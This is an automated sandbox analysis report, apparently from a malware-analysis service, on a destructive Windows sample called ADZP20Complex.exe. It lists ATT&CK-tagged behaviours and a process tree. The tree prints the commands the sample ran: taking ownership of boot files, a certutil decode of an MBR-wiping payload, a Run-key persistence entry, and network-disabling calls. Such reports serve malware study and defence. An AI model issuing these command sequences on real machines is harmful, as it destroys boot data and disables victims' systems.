690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408

Analysis

max time kernel
9s
max time network
129s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
19-11-2024 00:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP20Complex.exe
Size

112KB
MD5

81a7a946456f1f6dae4715b1feb72ed0
SHA1

af83b938017efd53f95671adc0c6d2aa1088d38e
SHA256

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408
SHA512

a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692
SSDEEP

3072:O7DhdC6kzWypvaQ0FxyNTBfHdIyEGfvBN+:OBlkZvaF4NTB/yyEGfvBQ

Score

8^/10

bootkit defense_evasion discovery evasion exploit persistence privilege_escalation upx

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\rspndr.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\sffdisk.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\storport.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\cdfs.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\dmvsc.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\hidir.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\luafv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\pci.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\pcmcia.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\qwavedrv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\1394bus.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\lltdio.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ndis.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\null.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\stream.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\TsUsbFlt.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\viaide.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\1394ohci.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\blbdrive.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fdc.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mpsdrv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\volmgr.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\arc.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\GAGP30KX.SYS	attrib.exe
File opened for modification	C:\Windows\System32\drivers\hwpolicy.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ks.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\MegaSR.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mouclass.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ndisuio.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\rasacd.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\b57nd60a.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\rassstp.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\raspptp.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\processr.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\srv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\gm.dls	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fastfat.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\hdaudbus.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ntfs.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\pcw.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\usbohci.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\bridge.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\rdpbus.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\vdrvroot.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\WdfLdr.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\Dumpata.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\tape.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ndiswan.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\wd.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\agilevpn.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\scsiport.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\stexstor.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\vwifimp.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\hidusb.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\parport.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\vwifibus.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mspclock.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\videoprt.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ohci1394.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\dxgmms1.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\usbehci.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\amdk8.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\FWPKCLNT.SYS	attrib.exe
File opened for modification	C:\Windows\System32\drivers\msiscsi.sys	attrib.exe

Modifies Windows Firewall 2 TTPs 13 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
14144	Process not Found
13444	Process not Found
4344	netsh.exe
13092	netsh.exe
6776	netsh.exe
13664	Process not Found
14060	Process not Found
12556	Process not Found
1920	netsh.exe
4236	netsh.exe
4672	netsh.exe
9944	netsh.exe
9652	netsh.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
4872	takeown.exe
6380	takeown.exe
7148	icacls.exe
11268	takeown.exe
2164	icacls.exe
4436	takeown.exe
11956	takeown.exe
12416	takeown.exe
8248	Process not Found
5036	takeown.exe
5084	icacls.exe
3808	takeown.exe
4912	icacls.exe
6712	takeown.exe
2768	icacls.exe
4332	takeown.exe
10580	icacls.exe
2704	icacls.exe
2708	takeown.exe
9668	takeown.exe
7032	takeown.exe
2084	takeown.exe
2776	takeown.exe
2616	takeown.exe
4344	icacls.exe
5244	icacls.exe
2408	icacls.exe
584	takeown.exe
5060	icacls.exe
4924	icacls.exe
5156	takeown.exe
12124	takeown.exe
4660	takeown.exe
4828	takeown.exe
6532	takeown.exe
5220	takeown.exe
9712	takeown.exe
3836	icacls.exe
10136	icacls.exe
12876	icacls.exe
5168	icacls.exe
6984	takeown.exe
8804	icacls.exe
11516	takeown.exe
4492	takeown.exe
6588	icacls.exe
7048	takeown.exe
3868	icacls.exe
4576	icacls.exe
9024	icacls.exe
13012	icacls.exe
7316	icacls.exe
4932	takeown.exe
3336	icacls.exe
2704	takeown.exe
13072	icacls.exe
13408	Process not Found
8664	takeown.exe
10840	icacls.exe
1776	takeown.exe
9340	icacls.exe
5568	icacls.exe
4844	takeown.exe
1916	takeown.exe

Drops startup file 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP20Complex.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP20Complex.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP20Complex.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP20Complex.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP20Complex.exe	cmd.exe

Executes dropped EXE 16 IoCs

pid	Process
1760	Tasksvc.exe
2364	ADZP20Complex.exe
1616	ADZP20Complex.exe
2464	ADZP20Complex.exe
2604	ADZP20Complex.exe
2860	ADZP20Complex.exe
2100	ADZP20Complex.exe
3076	ADZP20Complex.exe
3148	ADZP20Complex.exe
3244	ADZP20Complex.exe
3636	ADZP20Complex.exe
3708	ADZP20Complex.exe
3784	ADZP20Complex.exe
4412	ADZP20Complex.exe
4468	ADZP20Complex.exe
4520	ADZP20Complex.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5720	takeown.exe
10580	icacls.exe
5720	icacls.exe
13104	takeown.exe
584	takeown.exe
3296	takeown.exe
4924	icacls.exe
13072	icacls.exe
4844	takeown.exe
6380	takeown.exe
8132	icacls.exe
11220	takeown.exe
4768	icacls.exe
11684	takeown.exe
6964	icacls.exe
2728	icacls.exe
2164	icacls.exe
4912	icacls.exe
6636	takeown.exe
12328	icacls.exe
6400	takeown.exe
2708	takeown.exe
4828	takeown.exe
4492	takeown.exe
5156	takeown.exe
10680	takeown.exe
4620	takeown.exe
8248	Process not Found
5140	icacls.exe
6232	takeown.exe
4932	takeown.exe
12536	icacls.exe
12964	icacls.exe
10180	takeown.exe
10840	icacls.exe
12416	takeown.exe
4208	icacls.exe
4792	icacls.exe
5916	icacls.exe
11236	takeown.exe
1608	takeown.exe
3100	icacls.exe
5568	icacls.exe
5036	takeown.exe
5036	takeown.exe
6152	takeown.exe
6800	icacls.exe
11304	icacls.exe
11396	takeown.exe
2704	icacls.exe
5084	icacls.exe
3808	takeown.exe
11792	takeown.exe
12124	takeown.exe
2408	icacls.exe
2936	icacls.exe
1704	takeown.exe
6588	icacls.exe
6704	takeown.exe
7672	takeown.exe
4820	takeown.exe
6572	takeown.exe
5608	takeown.exe
2332	takeown.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
1736	certutil.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	format.com
File opened (read-only)	\??\B:	format.com

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Modifies boot configuration data using bcdedit 7 IoCs

pid	Process
3000	bcdedit.exe
4684	bcdedit.exe
4296	bcdedit.exe
5060	bcdedit.exe
13372	Process not Found
14036	Process not Found
11548	Process not Found

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Tasksvc.exe

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\winresume.exe	attrib.exe
File opened for modification	C:\Windows\System32\winload.exe	attrib.exe
File opened for modification	C:\Windows\System32\hal.dll	attrib.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001a3e6-261.dat	upx
behavioral1/memory/1760-263-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral1/memory/1760-408-0x0000000000400000-0x000000000040E000-memory.dmp	upx

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP20Complex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP20Complex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP20Complex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP20Complex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP20Complex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP20Complex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tasksvc.exe

Gathers network information 2 TTPs 16 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2640	ipconfig.exe
2424	ipconfig.exe
7120	ipconfig.exe
5340	ipconfig.exe
1032	ipconfig.exe
6668	ipconfig.exe
6784	ipconfig.exe
7096	ipconfig.exe
12396	ipconfig.exe
7072	ipconfig.exe
6644	ipconfig.exe
2792	ipconfig.exe
6608	ipconfig.exe
5456	ipconfig.exe
11580	ipconfig.exe
12724	ipconfig.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
4224	reg.exe
8868	reg.exe
10136	reg.exe
10508	reg.exe
2704	reg.exe
12980	reg.exe
6400	reg.exe
14180	Process not Found
1688	reg.exe
8912	reg.exe
9388	reg.exe
8580	reg.exe
13088	reg.exe
14248	Process not Found
12276	reg.exe
7188	reg.exe
2640	reg.exe
4292	reg.exe
7640	reg.exe
10624	reg.exe
11424	reg.exe
3068	reg.exe
12380	reg.exe
12404	reg.exe
9828	reg.exe
12220	Process not Found
2768	reg.exe
2568	reg.exe
8948	reg.exe
12556	reg.exe
3476	reg.exe
4304	reg.exe
12668	reg.exe
3836	reg.exe
10488	reg.exe
11384	reg.exe
1916	reg.exe
3860	reg.exe
1916	reg.exe
10632	reg.exe
12124	reg.exe
11236	reg.exe
13296	reg.exe
14040	Process not Found
1648	reg.exe
2668	reg.exe
572	reg.exe
14016	Process not Found
13248	reg.exe
11268	reg.exe
2760	reg.exe
3800	reg.exe
11100	reg.exe
12420	reg.exe
12012	reg.exe
12936	reg.exe
10928	Process not Found
7948	reg.exe
11184	reg.exe
9832	reg.exe
10164	reg.exe
11580	reg.exe
7244	reg.exe
3392	reg.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 16 IoCs

pid	Process
1760	Tasksvc.exe
2364	ADZP20Complex.exe
1616	ADZP20Complex.exe
2464	ADZP20Complex.exe
2604	ADZP20Complex.exe
2860	ADZP20Complex.exe
2100	ADZP20Complex.exe
3076	ADZP20Complex.exe
3148	ADZP20Complex.exe
3244	ADZP20Complex.exe
3636	ADZP20Complex.exe
3708	ADZP20Complex.exe
3784	ADZP20Complex.exe
4412	ADZP20Complex.exe
4468	ADZP20Complex.exe
4520	ADZP20Complex.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2084	takeown.exe
Token: SeTakeOwnershipPrivilege	1080	takeown.exe
Token: SeTakeOwnershipPrivilege	2708	takeown.exe
Token: SeTakeOwnershipPrivilege	2776	takeown.exe
Token: SeTakeOwnershipPrivilege	2128	takeown.exe
Token: SeTakeOwnershipPrivilege	2640	takeown.exe
Token: SeTakeOwnershipPrivilege	1828	takeown.exe
Token: SeTakeOwnershipPrivilege	1776	takeown.exe
Token: SeTakeOwnershipPrivilege	2636	takeown.exe
Token: SeTakeOwnershipPrivilege	1688	takeown.exe
Token: SeTakeOwnershipPrivilege	1608	takeown.exe
Token: SeTakeOwnershipPrivilege	2616	takeown.exe
Token: SeTakeOwnershipPrivilege	1704	takeown.exe
Token: SeTakeOwnershipPrivilege	2228	takeown.exe
Token: SeTakeOwnershipPrivilege	296	takeown.exe
Token: SeTakeOwnershipPrivilege	584	takeown.exe
Token: SeTakeOwnershipPrivilege	1376	takeown.exe

Suspicious use of SetWindowsHookEx 38 IoCs

pid	Process
3056	mspaint.exe
2056	mspaint.exe
2492	mspaint.exe
2492	mspaint.exe
3056	mspaint.exe
2056	mspaint.exe
2492	mspaint.exe
2492	mspaint.exe
3056	mspaint.exe
2056	mspaint.exe
3056	mspaint.exe
2056	mspaint.exe
2236	mspaint.exe
576	mspaint.exe
2064	mspaint.exe
3132	mspaint.exe
3228	mspaint.exe
2236	mspaint.exe
3356	mspaint.exe
576	mspaint.exe
2064	mspaint.exe
3700	mspaint.exe
3776	mspaint.exe
3844	mspaint.exe
3132	mspaint.exe
3228	mspaint.exe
3356	mspaint.exe
3700	mspaint.exe
3776	mspaint.exe
3844	mspaint.exe
2236	mspaint.exe
2236	mspaint.exe
576	mspaint.exe
576	mspaint.exe
2064	mspaint.exe
2064	mspaint.exe
4456	mspaint.exe
4512	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2984 wrote to memory of 2516	2984	ADZP20Complex.exe	31
PID 2984 wrote to memory of 2516	2984	ADZP20Complex.exe	31
PID 2984 wrote to memory of 2516	2984	ADZP20Complex.exe	31
PID 2984 wrote to memory of 2516	2984	ADZP20Complex.exe	31
PID 2516 wrote to memory of 2348	2516	cmd.exe	32
PID 2516 wrote to memory of 2348	2516	cmd.exe	32
PID 2516 wrote to memory of 2348	2516	cmd.exe	32
PID 2516 wrote to memory of 2084	2516	cmd.exe	34
PID 2516 wrote to memory of 2084	2516	cmd.exe	34
PID 2516 wrote to memory of 2084	2516	cmd.exe	34
PID 2348 wrote to memory of 1080	2348	cmd.exe	36
PID 2348 wrote to memory of 1080	2348	cmd.exe	36
PID 2348 wrote to memory of 1080	2348	cmd.exe	36
PID 2516 wrote to memory of 2644	2516	cmd.exe	35
PID 2516 wrote to memory of 2644	2516	cmd.exe	35
PID 2516 wrote to memory of 2644	2516	cmd.exe	35
PID 2516 wrote to memory of 2680	2516	cmd.exe	37
PID 2516 wrote to memory of 2680	2516	cmd.exe	37
PID 2516 wrote to memory of 2680	2516	cmd.exe	37
PID 2516 wrote to memory of 2708	2516	cmd.exe	38
PID 2516 wrote to memory of 2708	2516	cmd.exe	38
PID 2516 wrote to memory of 2708	2516	cmd.exe	38
PID 2516 wrote to memory of 2756	2516	cmd.exe	39
PID 2516 wrote to memory of 2756	2516	cmd.exe	39
PID 2516 wrote to memory of 2756	2516	cmd.exe	39
PID 2516 wrote to memory of 2760	2516	cmd.exe	40
PID 2516 wrote to memory of 2760	2516	cmd.exe	40
PID 2516 wrote to memory of 2760	2516	cmd.exe	40
PID 2516 wrote to memory of 2776	2516	cmd.exe	41
PID 2516 wrote to memory of 2776	2516	cmd.exe	41
PID 2516 wrote to memory of 2776	2516	cmd.exe	41
PID 2516 wrote to memory of 2936	2516	cmd.exe	42
PID 2516 wrote to memory of 2936	2516	cmd.exe	42
PID 2516 wrote to memory of 2936	2516	cmd.exe	42
PID 2516 wrote to memory of 2244	2516	cmd.exe	43
PID 2516 wrote to memory of 2244	2516	cmd.exe	43
PID 2516 wrote to memory of 2244	2516	cmd.exe	43
PID 2516 wrote to memory of 1736	2516	cmd.exe	44
PID 2516 wrote to memory of 1736	2516	cmd.exe	44
PID 2516 wrote to memory of 1736	2516	cmd.exe	44
PID 2516 wrote to memory of 1760	2516	cmd.exe	45
PID 2516 wrote to memory of 1760	2516	cmd.exe	45
PID 2516 wrote to memory of 1760	2516	cmd.exe	45
PID 2516 wrote to memory of 1760	2516	cmd.exe	45
PID 2516 wrote to memory of 836	2516	cmd.exe	46
PID 2516 wrote to memory of 836	2516	cmd.exe	46
PID 2516 wrote to memory of 836	2516	cmd.exe	46
PID 2516 wrote to memory of 1792	2516	cmd.exe	47
PID 2516 wrote to memory of 1792	2516	cmd.exe	47
PID 2516 wrote to memory of 1792	2516	cmd.exe	47
PID 2516 wrote to memory of 632	2516	cmd.exe	49
PID 2516 wrote to memory of 632	2516	cmd.exe	49
PID 2516 wrote to memory of 632	2516	cmd.exe	49
PID 2516 wrote to memory of 2792	2516	cmd.exe	50
PID 2516 wrote to memory of 2792	2516	cmd.exe	50
PID 2516 wrote to memory of 2792	2516	cmd.exe	50
PID 2516 wrote to memory of 760	2516	cmd.exe	106
PID 2516 wrote to memory of 760	2516	cmd.exe	106
PID 2516 wrote to memory of 760	2516	cmd.exe	106
PID 2516 wrote to memory of 2328	2516	cmd.exe	107
PID 2516 wrote to memory of 2328	2516	cmd.exe	107
PID 2516 wrote to memory of 2328	2516	cmd.exe	107
PID 2516 wrote to memory of 396	2516	cmd.exe	53
PID 2516 wrote to memory of 396	2516	cmd.exe	53

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6884	attrib.exe
11796	attrib.exe
13212	attrib.exe
5184	attrib.exe
6168	attrib.exe
6288	attrib.exe
7164	attrib.exe
9988	attrib.exe
3312	attrib.exe
12344	attrib.exe
8836	attrib.exe
4632	attrib.exe
5208	attrib.exe
12540	attrib.exe
10028	attrib.exe
12804	attrib.exe
12124	attrib.exe
2328	attrib.exe
4332	attrib.exe
7680	attrib.exe
11832	attrib.exe
10900	attrib.exe
2776	attrib.exe
584	attrib.exe
4420	attrib.exe
4912	attrib.exe
5168	attrib.exe
9524	attrib.exe
6904	attrib.exe
9340	attrib.exe
12416	attrib.exe
2680	attrib.exe
1324	attrib.exe
6600	attrib.exe
4576	attrib.exe
8476	attrib.exe
8988	Process not Found
4604	attrib.exe
5932	attrib.exe
11268	attrib.exe
9352	attrib.exe
6392	Process not Found
12540	attrib.exe
12328	attrib.exe
3168	attrib.exe
4712	attrib.exe
6512	attrib.exe
2108	attrib.exe
2752	attrib.exe
1500	attrib.exe
2136	attrib.exe
6620	attrib.exe
7984	attrib.exe
2408	attrib.exe
2484	attrib.exe
3480	attrib.exe
14240	Process not Found
4688	attrib.exe
6876	attrib.exe
5932	attrib.exe
10840	attrib.exe
2860	attrib.exe
7124	attrib.exe
2760	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BBE0.tmp\BBE1.tmp\BBE2.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
  2⤵
  - Drops startup file
  - Drops autorun.inf file
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2348
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1080
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winresume.exe"
    3⤵
    - Possible privilege escalation attempt
    - Suspicious use of AdjustPrivilegeToken
    PID:2084
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winresume.exe" /reset /c /q
    3⤵
    PID:2644
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:2680
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winload.exe"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2708
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winload.exe" /reset /c /q
    3⤵
    PID:2756
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winload.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:2760
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Possible privilege escalation attempt
    - Suspicious use of AdjustPrivilegeToken
    PID:2776
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:2936
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Drops file in System32 directory
    PID:2244
- - C:\Windows\system32\certutil.exe
    certutil -decode "C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp" "Tasksvc.exe"
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:1736
- - C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe
    Tasksvc.exe
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1760
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:836
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SetCursorPos
    3⤵
    PID:1792
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:632
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:2792
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
    3⤵
    - Adds Run key to start application
    PID:760
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:2328
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:396
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1244
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
